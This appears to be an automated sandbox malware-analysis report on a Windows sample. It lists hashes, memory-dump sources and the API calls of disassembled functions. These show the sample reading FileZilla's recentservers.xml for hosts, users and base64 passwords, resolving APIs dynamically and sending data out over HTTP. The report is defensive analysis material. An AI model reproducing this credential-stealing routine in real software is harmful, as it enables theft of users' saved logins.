                                            • Instruction ID: cab72d0b4ea9ddc15501a7fd6cd09df69f75190dee26d0f2eb2159b9085a1e79
                                            • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                            • Instruction Fuzzy Hash: 65C14975A0471A8FC715DF28C08055AB3F2FF88350F258A6DE8999B721D731E996CF81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                            • Instruction ID: 7245c5edd5537c552ad856bcf3b560c1abfe746c882565bbe1e7c655660e8e2e
                                            • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                            • Instruction Fuzzy Hash: 8F9146319287906EEB168B3CCCC17AABB59FFE6350F10C71BF988725A1FB7185818254
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                            • Instruction ID: fc4a33475f1b0b34b895ac0cd334d08e56316508e158cd4aa0582d37991ec486
                                            • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                            • Instruction Fuzzy Hash: EEA10AB6A10A19CBEB59CF59CCC5AAABBB1FB48314F24C22ED41AE7390D3349544CF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                            • Instruction ID: 6766ceac44d87fb7f43635d3d30a9452665cccf64b661245910ae004d7d8a5be
                                            • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                            • Instruction Fuzzy Hash: 82A15F72A087519BD308CF25C89075BF7E2EFC8710F1ACA3EE89997254D774E9419B82
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                            • Instruction ID: 164d2a370d3b900116d442ba017f9acb05165fe30783facad4c3115d99723a29
                                            • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                            • Instruction Fuzzy Hash: 5D514B76E09BD985C7058B7944502EEBFB21FE6104F2E829EC4982F383C335568AC3E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929328076.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_840000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction ID: 10cbc45072ac03862688e733fddf117f8cb0119047a13ae9312e56f9a9b634c2
                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction Fuzzy Hash: 66117C72340104AFD754DE59DCC1FA773EAFB89320B298065EE08CB316E676E841CB60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction ID: 97c5f606633d988940d90d4e470841c09bb514e6dbc887a5061ceb0af5f7922e
                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction Fuzzy Hash: BF01F27AA106108FDF21CF20C904BAB33E5EB8A306F1550A6DD4A97382E370A8458F80
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                            • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                            • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                            • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                            • Instruction ID: 72bcb140e429b4f9671c542887886c2a059e7f9290e44a7ac513dc818d29fb66
                                            • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                            • Instruction Fuzzy Hash: 8771C1324916009AD7723B32DE19E697FA3FF07744F10C61FD2B670DB09A226C659E52
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                            • strtok_s.MSVCRT ref: 0041047B
                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 004104C2
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004104C9
                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 004104E5
                                            • lstrlenA.KERNEL32(00000000), ref: 004104F3
                                              • Part of subcall function 00418A70: malloc.MSVCRT ref: 00418A78
                                              • Part of subcall function 00418A70: strncpy.MSVCRT ref: 00418A93
                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 0041052F
                                            • lstrlenA.KERNEL32(00000000), ref: 0041053D
                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00410579
                                            • lstrlenA.KERNEL32(00000000), ref: 00410587
                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004105C3
                                            • lstrlenA.KERNEL32(00000000), ref: 004105D5
                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 00410662
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041067A
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410692
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 004106AA
                                            • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 004106C2
                                            • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 004106D1
                                            • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 004106E0
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004106F3
                                            • lstrcatA.KERNEL32(?,00421770,?,?,00000000), ref: 00410702
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410715
                                            • lstrcatA.KERNEL32(?,00421774,?,?,00000000), ref: 00410724
                                            • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00410733
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410746
                                            • lstrcatA.KERNEL32(?,00421780,?,?,00000000), ref: 00410755
                                            • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410764
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410777
                                            • lstrcatA.KERNEL32(?,00421790,?,?,00000000), ref: 00410786
                                            • lstrcatA.KERNEL32(?,00421794,?,?,00000000), ref: 00410795
                                            • strtok_s.MSVCRT ref: 004107D9
                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004107EE
                                            • memset.MSVCRT ref: 0041083D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                            • API String ID: 337689325-555421843
                                            • Opcode ID: 4fc848dbf87095acd12c42b60f0aab464385706ec0422a8f446ef3a48111bdb9
                                            • Instruction ID: 8daa67574ba642934e37c5269d194fb48a2cec37eebf9d0dac7d381e96a5dd97
                                            • Opcode Fuzzy Hash: 4fc848dbf87095acd12c42b60f0aab464385706ec0422a8f446ef3a48111bdb9
                                            • Instruction Fuzzy Hash: 65D17271E01108ABCB04EBF0ED56EEE7339AF54315F50855AF102B7095EF38AA94CB69
                                            APIs
                                            • lstrlen.KERNEL32(00424EC8), ref: 02454883
                                            • lstrlen.KERNEL32(00424F78), ref: 0245488E
                                            • lstrlen.KERNEL32(00425040), ref: 02454899
                                            • lstrlen.KERNEL32(004250F8), ref: 024548A4
                                            • lstrlen.KERNEL32(004251A0), ref: 024548AF
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 024548BE
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 024548C5
                                            • lstrlen.KERNEL32(00425248), ref: 024548D3
                                            • lstrlen.KERNEL32(004252F0), ref: 024548DE
                                            • lstrlen.KERNEL32(00425398), ref: 024548E9
                                            • lstrlen.KERNEL32(00425440), ref: 024548F4
                                            • lstrlen.KERNEL32(004254E8), ref: 024548FF
                                            • lstrlen.KERNEL32(00425590), ref: 02454913
                                            • lstrlen.KERNEL32(00425638), ref: 0245491E
                                            • lstrlen.KERNEL32(004256E0), ref: 02454929
                                            • lstrlen.KERNEL32(00425788), ref: 02454934
                                            • lstrlen.KERNEL32(00425830), ref: 0245493F
                                            • lstrlen.KERNEL32(004258D8), ref: 02454968
                                            • lstrlen.KERNEL32(00425980), ref: 02454973
                                            • lstrlen.KERNEL32(00425A48), ref: 0245497E
                                            • lstrlen.KERNEL32(00425AF0), ref: 02454989
                                            • lstrlen.KERNEL32(00425B98), ref: 02454994
                                            • strlen.MSVCRT ref: 024549A7
                                            • lstrlen.KERNEL32(00425C40), ref: 024549CF
                                            • lstrlen.KERNEL32(00425CE8), ref: 024549DA
                                            • lstrlen.KERNEL32(00425D90), ref: 024549E5
                                            • lstrlen.KERNEL32(00425E38), ref: 024549F0
                                            • lstrlen.KERNEL32(00425EE0), ref: 024549FB
                                            • lstrlen.KERNEL32(00425F88), ref: 02454A0B
                                            • lstrlen.KERNEL32(00426030), ref: 02454A16
                                            • lstrlen.KERNEL32(004260D8), ref: 02454A21
                                            • lstrlen.KERNEL32(00426180), ref: 02454A2C
                                            • lstrlen.KERNEL32(00426228), ref: 02454A37
                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 02454A53
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                            • String ID:
                                            • API String ID: 2127927946-0
                                            • Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                            • Instruction ID: 3941cfc74ddaa80ea60a23cbe0ed731c6c85183ead6f68745c82be55e95be943
                                            • Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                            • Instruction Fuzzy Hash: 99412D79740624ABD7109FE5FC4EADCBF60AB4C712B908051F90A89190C7F59385DB7D
                                            APIs
                                            • GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 02469E58
                                            • GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 02469E71
                                            • GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 02469E89
                                            • GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 02469EA1
                                            • GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 02469EBA
                                            • GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 02469ED2
                                            • GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 02469EEA
                                            • GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 02469F03
                                            • GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 02469F1B
                                            • GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 02469F33
                                            • GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 02469F4C
                                            • GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 02469F64
                                            • GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 02469F7C
                                            • GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 02469F95
                                            • GetProcAddress.KERNEL32(006D72B8,006D6F98), ref: 02469FAD
                                            • GetProcAddress.KERNEL32(006D72B8,006D6C24), ref: 02469FC5
                                            • GetProcAddress.KERNEL32(006D72B8,006D6E18), ref: 02469FDE
                                            • GetProcAddress.KERNEL32(006D72B8,006D7034), ref: 02469FF6
                                            • GetProcAddress.KERNEL32(006D72B8,006D6ABC), ref: 0246A00E
                                            • GetProcAddress.KERNEL32(006D72B8,006D6B2C), ref: 0246A027
                                            • GetProcAddress.KERNEL32(006D72B8,006D6CB0), ref: 0246A03F
                                            • LoadLibraryA.KERNEL32(006D6F50,?,02466F07), ref: 0246A051
                                            • LoadLibraryA.KERNEL32(006D6B7C,?,02466F07), ref: 0246A062
                                            • LoadLibraryA.KERNEL32(006D6B04,?,02466F07), ref: 0246A074
                                            • LoadLibraryA.KERNEL32(006D6BDC,?,02466F07), ref: 0246A086
                                            • LoadLibraryA.KERNEL32(006D6D28,?,02466F07), ref: 0246A097
                                            • GetProcAddress.KERNEL32(006D70DC,006D6EAC), ref: 0246A0B9
                                            • GetProcAddress.KERNEL32(006D71FC,006D6E24), ref: 0246A0DA
                                            • GetProcAddress.KERNEL32(006D71FC,006D6BCC), ref: 0246A0F2
                                            • GetProcAddress.KERNEL32(006D72EC,006D6D94), ref: 0246A114
                                            • GetProcAddress.KERNEL32(006D71B0,006D6B28), ref: 0246A135
                                            • GetProcAddress.KERNEL32(006D71E0,006D6E14), ref: 0246A156
                                            • GetProcAddress.KERNEL32(006D71E0,0042072C), ref: 0246A16D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID:
                                            • API String ID: 2238633743-0
                                            • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                            • Instruction ID: 7d2e7bc78a1e8dc5b4cd2013251f105c8d19fc3f62d4a142a136724eeab56454
                                            • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                            • Instruction Fuzzy Hash: 94A15EB5D0A254AFC344DFA8FC889567BBBA74D301718A61BF909C3674E734A640CF62
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 024691D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02469202
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 0245A377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0245A3A3
                                              • Part of subcall function 0245A377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0245A3C8
                                              • Part of subcall function 0245A377: LocalAlloc.KERNEL32(00000040,?), ref: 0245A3E8
                                              • Part of subcall function 0245A377: ReadFile.KERNEL32(000000FF,?,00000000,024516F6,00000000), ref: 0245A411
                                              • Part of subcall function 0245A377: LocalFree.KERNEL32(024516F6), ref: 0245A447
                                              • Part of subcall function 0245A377: CloseHandle.KERNEL32(000000FF), ref: 0245A451
                                              • Part of subcall function 02469227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02469249
                                            • strtok_s.MSVCRT ref: 024606E2
                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 02460729
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02460730
                                            • StrStrA.SHLWAPI(00000000,00421710), ref: 0246074C
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 0246075A
                                              • Part of subcall function 02468CD7: malloc.MSVCRT ref: 02468CDF
                                              • Part of subcall function 02468CD7: strncpy.MSVCRT ref: 02468CFA
                                            • StrStrA.SHLWAPI(00000000,00421718), ref: 02460796
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024607A4
                                            • StrStrA.SHLWAPI(00000000,00421720), ref: 024607E0
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024607EE
                                            • StrStrA.SHLWAPI(00000000,00421728), ref: 0246082A
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 0246083C
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024608C9
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024608E1
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 024608F9
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 02460911
                                            • lstrcat.KERNEL32(?,00421744), ref: 02460929
                                            • lstrcat.KERNEL32(?,00421758), ref: 02460938
                                            • lstrcat.KERNEL32(?,00421768), ref: 02460947
                                            • lstrcat.KERNEL32(?,00000000), ref: 0246095A
                                            • lstrcat.KERNEL32(?,00421770), ref: 02460969
                                            • lstrcat.KERNEL32(?,00000000), ref: 0246097C
                                            • lstrcat.KERNEL32(?,00421774), ref: 0246098B
                                            • lstrcat.KERNEL32(?,00421778), ref: 0246099A
                                            • lstrcat.KERNEL32(?,00000000), ref: 024609AD
                                            • lstrcat.KERNEL32(?,00421780), ref: 024609BC
                                            • lstrcat.KERNEL32(?,00421784), ref: 024609CB
                                            • lstrcat.KERNEL32(?,00000000), ref: 024609DE
                                            • lstrcat.KERNEL32(?,00421790), ref: 024609ED
                                            • lstrcat.KERNEL32(?,00421794), ref: 024609FC
                                            • strtok_s.MSVCRT ref: 02460A40
                                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 02460A55
                                            • memset.MSVCRT ref: 02460AA4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                            • String ID:
                                            • API String ID: 3689735781-0
                                            • Opcode ID: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
                                            • Instruction ID: 3f840db8a8025c9a5d5aed53fcbcfe2b5a50a2dabea6e3b2d06f72193b421fa7
                                            • Opcode Fuzzy Hash: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
                                            • Instruction Fuzzy Hash: 0DD13D71D01618ABCB04EBE1DD59EFE773AAF54701F50855EE102B6090EF35AA08CF62
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                              • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
                                            • StrCmpCA.SHLWAPI(?,009D1ED0), ref: 00405A63
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,009D1FA0,00000000,?,009CBD08,00000000,?,00421B4C), ref: 00405EC1
                                            • lstrlenA.KERNEL32(00000000), ref: 00405ED2
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
                                            • HeapAlloc.KERNEL32(00000000), ref: 00405EEA
                                            • lstrlenA.KERNEL32(00000000), ref: 00405EFF
                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
                                            • lstrlenA.KERNEL32(00000000), ref: 00405F28
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
                                            • memcpy.MSVCRT(?), ref: 00405F4E
                                            • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
                                            • InternetCloseHandle.WININET(00000000), ref: 00406000
                                            • InternetCloseHandle.WININET(00000000), ref: 0040600D
                                            • HttpOpenRequestA.WININET(00000000,009D1E40,?,009D1218,00000000,00000000,00400100,00000000), ref: 00405C48
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
